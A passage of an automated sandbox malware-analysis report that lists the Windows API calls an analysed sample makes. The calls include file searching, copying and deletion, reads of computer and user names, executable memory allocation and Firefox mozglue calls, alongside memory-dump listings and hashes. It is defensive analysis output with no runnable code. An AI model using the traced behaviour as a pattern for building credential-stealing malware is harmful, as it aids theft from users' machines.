                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194576
                                      • Part of subcall function 001943F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0019458C
                                      • Part of subcall function 001943F0: DeleteFileA.KERNEL32(?), ref: 00194611
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 001944E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID:
                                    • API String ID: 2104210347-0
                                    • Opcode ID: 450db1b86dc81c30d1b72787dd29f35c53ae300be053181e0725800526e26aee
                                    • Instruction ID: c439ce58d8398f491d28f0b7354a99e22c8868b53c73abd98d80d36a72b6c2e1
                                    • Opcode Fuzzy Hash: 450db1b86dc81c30d1b72787dd29f35c53ae300be053181e0725800526e26aee
                                    • Instruction Fuzzy Hash: CA41B4BB9001046BDB55F7B4EC42EEE333DA7AA300F408548B54A96181EF755B898BA1
                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00186756
                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 001867A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 59d0ac6d2e3631801718010bf7bd8c2911f4fee1ec0b0f692ba714aca86f7f1a
                                    • Instruction ID: 08331dfaef86c888ba7c3e4fbc1c0f69e2db76f8ca32ead0d5b104b250f4807a
                                    • Opcode Fuzzy Hash: 59d0ac6d2e3631801718010bf7bd8c2911f4fee1ec0b0f692ba714aca86f7f1a
                                    • Instruction Fuzzy Hash: 1441DE74A00209EFCB44DF58C494BADBBB1FF44314F2486A9E9499B345D735EA81CF84
                                    APIs
                                      • Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                    • lstrcat.KERNEL32(?,00000000), ref: 00194B6A
                                    • lstrcat.KERNEL32(?,013ADFD0), ref: 00194B88
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
                                      • Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                    • String ID:
                                    • API String ID: 2699682494-0
                                    • Opcode ID: dd91929ac71a7288bb6595f5b4a8f3348464c2203b9bfe211ca77676ddc72895
                                    • Instruction ID: f848e82a978e387ee0065f07eb9d3825d3ab08d2d5eca4d343cb18fb2442bd4f
                                    • Opcode Fuzzy Hash: dd91929ac71a7288bb6595f5b4a8f3348464c2203b9bfe211ca77676ddc72895
                                    • Instruction Fuzzy Hash: 3D01967651020867CB14FB70DC46EEE733CAB66300F404599B64A97191EFB4ABC88BE1
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001810B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001810F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 7887d91a1177f40cdb335a4f7156c6ce6bfb9972a8e527ced2c6c0b46cb4e9f0
                                    • Instruction ID: 7e87a6b65fff3133a255a95f99bbf194b8526c3a86e35548299ef75390c442c2
                                    • Opcode Fuzzy Hash: 7887d91a1177f40cdb335a4f7156c6ce6bfb9972a8e527ced2c6c0b46cb4e9f0
                                    • Instruction Fuzzy Hash: A5F0E272641218BBE714AAA4AC49FAEB7DCA706B04F300448F600E3280D6719F008B60
                                    APIs
                                    • GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A554C,?,?,001A0E07), ref: 0019883F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: e61f69b74798fd518d567aa7799b0445fe4beab348ef5f0ef3277391d0a91875
                                    • Instruction ID: dda5d54c3596c08b4427a66646e0b674e98df896b8f44ba2951ebddbfe060346
                                    • Opcode Fuzzy Hash: e61f69b74798fd518d567aa7799b0445fe4beab348ef5f0ef3277391d0a91875
                                    • Instruction Fuzzy Hash: F3F03971C0020CEFCF04EFA4C8596ACBB75EF11314F908299E829A7291DBB45B49CF91
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 1699248803-0
                                    • Opcode ID: b2cf4df68af7d844435e902dd6cf75e6338634039a44752d5c5e3bdfcb955dc2
                                    • Instruction ID: 8f4f7d06ea5c1907f505131979ac9da88d5c9dc1735450568534169a6c5cc65b
                                    • Opcode Fuzzy Hash: b2cf4df68af7d844435e902dd6cf75e6338634039a44752d5c5e3bdfcb955dc2
                                    • Instruction Fuzzy Hash: 5CE01A71A4034C6BDB55EB90CC96FEE736CAB44B01F404295BA0C9B1C0DE70AB858B91
                                    APIs
                                      • Part of subcall function 00197380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
                                      • Part of subcall function 00197380: RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
                                      • Part of subcall function 00197380: GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF
                                      • Part of subcall function 001972F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
                                      • Part of subcall function 001972F0: RtlAllocateHeap.NTDLL(00000000), ref: 00197327
                                      • Part of subcall function 001972F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F
                                    • ExitProcess.KERNEL32 ref: 001811C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 658b5cb4503ae97063187b69e39aeb03953937165ee7876afbfe45cff6e21dc6
                                    • Instruction ID: 32ce0bf248b84f3b507574158927444e31573adecbd26623884c98aabe6a790b
                                    • Opcode Fuzzy Hash: 658b5cb4503ae97063187b69e39aeb03953937165ee7876afbfe45cff6e21dc6
                                    • Instruction Fuzzy Hash: 5EE017A692430266DE1077B4AC0AF2B728C5F3630AF001424FA08C3142EF25F9108765
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: AllocLocal
                                    • String ID:
                                    • API String ID: 3494564517-0
                                    • Opcode ID: 41328dac7fb73fedb6be9743df7e0d5fc7c6efdd650eeb1b0563f75a0a6f5899
                                    • Instruction ID: ec0caabe4b7f0e4d968e204698eb60af625ea473fd583ed446eb9d0971d87503
                                    • Opcode Fuzzy Hash: 41328dac7fb73fedb6be9743df7e0d5fc7c6efdd650eeb1b0563f75a0a6f5899
                                    • Instruction Fuzzy Hash: 7E01E47490420CEFCF05CF98D595BACBBB5AF46308F248088E9456B380C7746A84DB46
                                    APIs
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C685492
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6854A8
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6854BE
                                    • __Init_thread_footer.LIBCMT ref: 6C6854DB
                                      • Part of subcall function 6C6AAB3F: EnterCriticalSection.KERNEL32(6C6FE370,?,?,6C673527,6C6FF6CC,?,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB49
                                      • Part of subcall function 6C6AAB3F: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C673527,6C6FF6CC,?,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AAB7C
                                      • Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
                                      • Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6854F9
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C685516
                                    • GetCurrentThreadId.KERNEL32 ref: 6C68556A
                                    • AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C685577
                                    • moz_xmalloc.MOZGLUE(00000070), ref: 6C685585
                                    • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C685590
